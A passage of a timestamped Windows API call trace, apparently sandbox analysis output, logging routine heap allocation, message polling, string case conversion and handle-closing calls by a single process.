wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.157] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.157] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.157] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.157] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.158] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0257.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.158] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0257.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.158] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.161] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0257.161] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0257.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.161] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0257.162] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.162] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.162] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0257.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.163] FreeLibrary (hLibModule=0x74d40000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.164] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0257.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.165] CloseHandle (hObject=0x1f8) returned 1 [0257.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0257.169] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0257.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.170] CloseHandle (hObject=0x2cc) returned 1 [0257.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0257.174] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 